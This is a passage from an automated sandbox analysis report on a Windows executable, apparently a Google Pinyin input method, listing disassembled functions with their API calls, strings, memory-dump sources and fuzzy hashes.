Instruction Fuzzy Hash: 3F01E9B6504B409BC730DFAAD8C4807F7E9BF693157109E2EE58AD3A60D638F485CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00408640, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00408807

Strings

+, xrefs: 0040879B
$, xrefs: 00408698
%, xrefs: 0040878D

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 5ba72fa8b57408e70dec512818ed8d1f5e8bda167ed16da683f7d082a729a34b
Instruction ID: 896dc2f89405a5fc7341dc2a4e4440f4d605f6e9183d27cbf1da0397f7c9493f
Opcode Fuzzy Hash: 5ba72fa8b57408e70dec512818ed8d1f5e8bda167ed16da683f7d082a729a34b
Instruction Fuzzy Hash: E5517C72A0430096D7159A48CF8179B7BE4AB81740F355D6EE8C1A33DAEE3D8C058BCA

Uniqueness

Uniqueness Score: -1.00%

Function 00408850, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00408A05

Strings

%, xrefs: 0040898B
$, xrefs: 004088A8
+, xrefs: 00408999

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 6391677ecbd26767af36d5449efbc8b2baa191fdbc1b970c9463654af3ee2bd8
Instruction ID: c3aa8c066b60121218bd29c86794a9a44f5f8f3aa7733616451b5ff3511f8483
Opcode Fuzzy Hash: 6391677ecbd26767af36d5449efbc8b2baa191fdbc1b970c9463654af3ee2bd8
Instruction Fuzzy Hash: FA514CB29043409AD715AA48CA857BB7BE4AB85310F14996EF8C1A33D1DB3DCC45878B

Uniqueness

Uniqueness Score: -1.00%

Function 004147B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00405450: std::_Xinvalid_argument.LIBCPMT ref: 004054B0
Part of subcall function 00405450: _memmove.LIBCMT ref: 00405506

Part of subcall function 0040E1F0: RegQueryValueExW.ADVAPI32 ref: 0040E240

PathCombineW.SHLWAPI(?,?,Dictionaries,?,00000008), ref: 00414926

Part of subcall function 00405050: RegCloseKey.ADVAPI32(00000000,09D48295,00000000,00000000,0050F9D8,000000FF,0040E97D,00000000,00000000), ref: 004050B2

Strings

Software\Google\Google Pinyin 2, xrefs: 00414816
DataPath, xrefs: 004148A4
Dictionaries, xrefs: 0041491B

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCombinePathQueryValueXinvalid_argument_memmovestd::_
String ID: DataPath$Dictionaries$Software\Google\Google Pinyin 2
API String ID: 3211815777-3380162126
Opcode ID: fed9466268cc4194bc3e50e7c9e0d82f18656fa61026b96dc0f5121e7932bd7b
Instruction ID: 2e978295e6d1390ebad5ad909061b1a602fd14210c8efcec418bcf4c33022adb
Opcode Fuzzy Hash: fed9466268cc4194bc3e50e7c9e0d82f18656fa61026b96dc0f5121e7932bd7b
Instruction Fuzzy Hash: FF5168B15183819BC760EF2A884175FFBE4BFD9714F404A2EF5D883291DB7898488B57

Uniqueness

Uniqueness Score: -1.00%

Function 00465540, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 132synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4

CreateMutexW.KERNEL32(00000000,00000000,GPY_DATA_STAT_MUTEX_2,00000000), ref: 004655C5

Part of subcall function 004DC020: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,?,00000000), ref: 004DC04D

PathFileExistsW.SHLWAPI(00000007,?,?), ref: 004656BB

Strings

GPY_DATA_STAT_MUTEX_2, xrefs: 004655BE
imedata.dat, xrefs: 00465628

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertCreateExistsFileMutexPathString_malloc
String ID: GPY_DATA_STAT_MUTEX_2$imedata.dat
API String ID: 3731759923-1272836789
Opcode ID: 1e22f8976c2c7ff8c70d33084688facfeee18e988213322d2af3993a9e857edb
Instruction ID: 4de089b7610da8ae390e6b5762efbc2e013406e73f6be4c5e25d0c13b00a0f95
Opcode Fuzzy Hash: 1e22f8976c2c7ff8c70d33084688facfeee18e988213322d2af3993a9e857edb
Instruction Fuzzy Hash: 5E516CB19083859FDB10DF6AD84178BBBE4BF54704F40892FF98987241E7799808CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00437550, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043766B
_memcpy_s.LIBCMT ref: 0043769C

Strings

memcpy failed., xrefs: 004376D8
p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\storage\optional_control_file.cc, xrefs: 004376B3

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcpy_s_memset
String ID: memcpy failed.$p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\storage\optional_control_file.cc
API String ID: 2435022074-2067352644
Opcode ID: cbe1dca3519a7fe54bb71d795f537ab5cc1dc1d23536fd75cd14c0b338087f68
Instruction ID: 25f1534a26e32bf3350baeb1ad16abb513617a3525ddf7b9ca45fb3571cc456e
Opcode Fuzzy Hash: cbe1dca3519a7fe54bb71d795f537ab5cc1dc1d23536fd75cd14c0b338087f68
Instruction Fuzzy Hash: CE519370108782DFD334DF24C881B9AB7E0FB84350F008A2EE49D97681D734A845CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00412140, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,ModeModified,00000000,?,?,09D48295,09D48295,00000000,?,?,00000000,?,?,?,?,00000000), ref: 0041219A
RegQueryValueExW.ADVAPI32(?,Param1Modified,00000000,?,?,?,?,00000000,?,?,?,?,00000000,005158C8,000000FF,00411E38), ref: 0041220E

Strings

Param1Modified, xrefs: 00412204
ModeModified, xrefs: 00412187

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue
String ID: ModeModified$Param1Modified
API String ID: 3660427363-665322461
Opcode ID: 02a07b27746fd61a4ee01eb9cc45749cafff49177decdca6c619778f6037f9a5
Instruction ID: f9beb610f91e9a3a3aaa6ede057b4f33c130d059ff469d0fdba426618e8df85f
Opcode Fuzzy Hash: 02a07b27746fd61a4ee01eb9cc45749cafff49177decdca6c619778f6037f9a5
Instruction Fuzzy Hash: 1841BFB1604305AFC714CF18C984E9BB7E9FB88710F41462EF959D7240D378EA8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405450, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004054B0
_memmove.LIBCMT ref: 00405506

Strings

string too long, xrefs: 004054AB
GooglePinyinService.exe, xrefs: 00405492, 00405504

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: GooglePinyinService.exe$string too long
API String ID: 256744135-2782175003
Opcode ID: e508125c03ea7b6cea0982d585e32a83b2b09672ded9855e1a982bb02704c304
Instruction ID: c9e46651481b641dd2f0b748745026102ff4b3c2a5927a0e9dd5109849b78efe
Opcode Fuzzy Hash: e508125c03ea7b6cea0982d585e32a83b2b09672ded9855e1a982bb02704c304
Instruction Fuzzy Hash: C021C372304A088BC620CE5DE88496BF3EAEFD1712310093FE046D7690E678EC858F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0045C690, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CertNameToStrW.CRYPT32(00010001,?,52000003,?,00000800), ref: 0045C6F0

Part of subcall function 0045C560: _wcschr.LIBCMT ref: 0045C61E

Strings

pQS, xrefs: 0045C731
`QS, xrefs: 0045C708
hQS, xrefs: 0045C719

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CertName_wcschr
String ID: `QS$hQS$pQS
API String ID: 1273968486-1899858708
Opcode ID: 5b00946828b1da651bb18103c6b07ffacc542c5c8ebb2f4c54f7795f655971d4
Instruction ID: 58236c9687db34ba3b2a24360df0d50e29f152bb5ebc893de4f9418b1cbc9ad7
Opcode Fuzzy Hash: 5b00946828b1da651bb18103c6b07ffacc542c5c8ebb2f4c54f7795f655971d4
Instruction Fuzzy Hash: 9611C0316103465FD764EB55D891AABB3D8BFC8701F44842EA88987342EF78D84DCBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00465030, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00465042

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

Strings

gfff, xrefs: 00465088
vector<T> too long, xrefs: 0046503D
gfff, xrefs: 0046504C

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: 3ea6e4bf509ba5dea341d2deb8f7f1f51bdcdf02967d91816bc45f7b5af263bb
Instruction ID: f9cb32072472f18a0d4228535227e986907eb93425c05be09b57a8f4108dbd12
Opcode Fuzzy Hash: 3ea6e4bf509ba5dea341d2deb8f7f1f51bdcdf02967d91816bc45f7b5af263bb
Instruction Fuzzy Hash: EA1181B52006068FC728DF5BE89082BB7E5EBC4304B14892EE496CB745E631F815CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00406370, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,0055F6E8,004069FE,00000002), ref: 00406390
GetModuleFileNameA.KERNEL32(00000000,0055F6E8,00000104), ref: 004063A9
_strrchr.LIBCMT ref: 004063B6

Strings

/debug.log, xrefs: 004063D8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamePathTemp_strrchr
String ID: /debug.log
API String ID: 3931546241-2552188261
Opcode ID: f3e77ed9f2ef5b4c914a765d3d80219d36513effa1d16fbcb48a3a2581eea8e4
Instruction ID: 666cbcd6a4c3d8e9e8bb922fe1cdc8706efb8c60b7c6ffae5c930ad9e526980a
Opcode Fuzzy Hash: f3e77ed9f2ef5b4c914a765d3d80219d36513effa1d16fbcb48a3a2581eea8e4
Instruction Fuzzy Hash: 4C1144706443416BE7208B20BD2AB133FA0AF73702F148076EB459B3E2E6B4801CCB49

Uniqueness

Uniqueness Score: -1.00%

Function 0045F750, Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045F774

Part of subcall function 0045F580: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?,?,?,0045F781,00000000,00000000), ref: 0045F598
Part of subcall function 0045F580: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,?,?,0045F781,00000000,00000000), ref: 0045F5B4
Part of subcall function 0045F580: _malloc.LIBCMT ref: 0045F605

SetFilePointer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0045F79D
CloseHandle.KERNEL32(?,00000000,00000000), ref: 0045F897
_malloc.LIBCMT ref: 0045F8D6

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$_malloc$CloseHandle_memset
String ID:
API String ID: 3969787500-0
Opcode ID: ee5f01920d6df3327391ae6af5818d4beca59b1e987e73d0846d8edb2f4fb0ac
Instruction ID: bed20ff5ad1310d46e84cbf25ce929ab56935b96d6664552130ec3f4d254a885
Opcode Fuzzy Hash: ee5f01920d6df3327391ae6af5818d4beca59b1e987e73d0846d8edb2f4fb0ac
Instruction Fuzzy Hash: EB51B1B2A043015BE320EE699C8092B73D59B99759F404A3EFD55C3243E739EA0D879B

Uniqueness

Uniqueness Score: -1.00%

Function 004544E0, Relevance: 6.2, APIs: 4, Instructions: 150networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045452B
InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004545A7
InternetCloseHandle.WININET(?), ref: 004545F6
__cftoe.LIBCMT ref: 00454642

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandle__cftoe_memset
String ID:
API String ID: 2321452383-0
Opcode ID: 9644da4b6eefd3c97d89873d8b1bcf2307cd1f1e9a78f274aeac83c52c2abc0d
Instruction ID: defa0194adb5cf3b3559ed03a6115812ad63dcee6d122d44f7019892a3de2ca1
Opcode Fuzzy Hash: 9644da4b6eefd3c97d89873d8b1bcf2307cd1f1e9a78f274aeac83c52c2abc0d
Instruction Fuzzy Hash: 0A51A2B1204741AFD720CF65C891A6BB3E9FFC8348F00891EF2DA87251D778E9498B56

Uniqueness

Uniqueness Score: -1.00%

Function 004DC0C0, Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004DC0F3
_memset.LIBCMT ref: 004DC113
GetFullPathNameW.KERNEL32(?,00000104,?,?,?,?,?,?,?,?), ref: 004DC137
GetShortPathNameW.KERNEL32 ref: 004DC162

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: NamePath_memset$FullShort
String ID:
API String ID: 4143433519-0
Opcode ID: 6358c8c98164c7715a598fc3ce8b1fca45047d9eb0f575198956dffcdc5544ae
Instruction ID: 3e4eb508c869b9be702f5ce98d7d2b01e6d5acb2d2095b2fb3aea5f759be4de0
Opcode Fuzzy Hash: 6358c8c98164c7715a598fc3ce8b1fca45047d9eb0f575198956dffcdc5544ae
Instruction Fuzzy Hash: 3E41D6726042159BC724DF51ECD599F73E5EFC5314F40082FF945D7242D638A909CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E500, Relevance: 6.1, APIs: 4, Instructions: 99registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E545
_memmove.LIBCMT ref: 0040E56B
lstrlenW.KERNEL32(00000000,?,?,?,00000000,0043A5F7,09D48295,09D48295,09D482B1,?,09D48295), ref: 0040E5B6
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,00000000,00000000,?,00000000,0043A5F7,09D48295,09D48295,09D482B1,?,09D48295), ref: 0040E5D6

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Value_memmove_memsetlstrlen
String ID:
API String ID: 1178772764-0
Opcode ID: 645a90b92766f548ceec8b70ba4051aa86d24c5dc88e7f1f346000e008e084df
Instruction ID: aa21c139830abd97e5cb6e7d6bca90c7f9d984f04759547f625e401f47ab8b7e
Opcode Fuzzy Hash: 645a90b92766f548ceec8b70ba4051aa86d24c5dc88e7f1f346000e008e084df
Instruction Fuzzy Hash: 1D31E772600210ABC720DF59CC8596BB3A9FF50309F044D2EF905AB241E735FD1587E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0B0, Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040A0DB
std::_Lockit::_Lockit.LIBCPMT ref: 0040A101
std::_Lockit::_Lockit.LIBCPMT ref: 0040A197
std::locale::facet::_Facet_Register.LIBCPMT ref: 0040A1B2

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Facet_Registerstd::locale::facet::_
String ID:
API String ID: 3374953348-0
Opcode ID: 0b09e7cffa2f9db346dd9027c605e69f12aee55d422814bc2b9b9bc05f029af7
Instruction ID: e5b4187b41e573fc6bfe1a3f53d8d66a0edecc3f3e446ea1eca80a75c8bf8b0e
Opcode Fuzzy Hash: 0b09e7cffa2f9db346dd9027c605e69f12aee55d422814bc2b9b9bc05f029af7
Instruction Fuzzy Hash: 6631E371908350CFD714EF25D891B5A73A0FB14729F14062FE452AB2D2EB38AC09CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 00440350, Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0044037B
std::_Lockit::_Lockit.LIBCPMT ref: 004403A1
std::_Lockit::_Lockit.LIBCPMT ref: 00440437
std::locale::facet::_Facet_Register.LIBCPMT ref: 00440452

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Facet_Registerstd::locale::facet::_
String ID:
API String ID: 3374953348-0
Opcode ID: a291f75c7cb304935175775519b2ded7fee93b9ba2e586c68a5492dcbc666e16
Instruction ID: c466f8e9d7bf501a3572a539f6bd10d457c7ec7f6e29a0bbab235c23c5e405b5
Opcode Fuzzy Hash: a291f75c7cb304935175775519b2ded7fee93b9ba2e586c68a5492dcbc666e16
Instruction Fuzzy Hash: 3E31E871504391CFE714EF16D851B5A77A0FF14329F00462FEA52972D2DB38AC19CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040A400, Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040A42B
std::_Lockit::_Lockit.LIBCPMT ref: 0040A451
std::_Lockit::_Lockit.LIBCPMT ref: 0040A4E7
std::locale::facet::_Facet_Register.LIBCPMT ref: 0040A502

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Facet_Registerstd::locale::facet::_
String ID:
API String ID: 3374953348-0
Opcode ID: b8b50bb6db744f2c372e8f2b889271fc40b92cc501dbb653f0f9aab0df951254
Instruction ID: 3ca2cd8b85bddebb8daa3a252d8da96bd9390f4ccff41b4f4055acafdaa78258
Opcode Fuzzy Hash: b8b50bb6db744f2c372e8f2b889271fc40b92cc501dbb653f0f9aab0df951254
Instruction Fuzzy Hash: 8F31D475804391CFC714EF15D855B5A73A0BB24329F10463FE892A72D1EB7CA808CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A530, Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040A55B
std::_Lockit::_Lockit.LIBCPMT ref: 0040A581
std::_Lockit::_Lockit.LIBCPMT ref: 0040A617
std::locale::facet::_Facet_Register.LIBCPMT ref: 0040A632

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
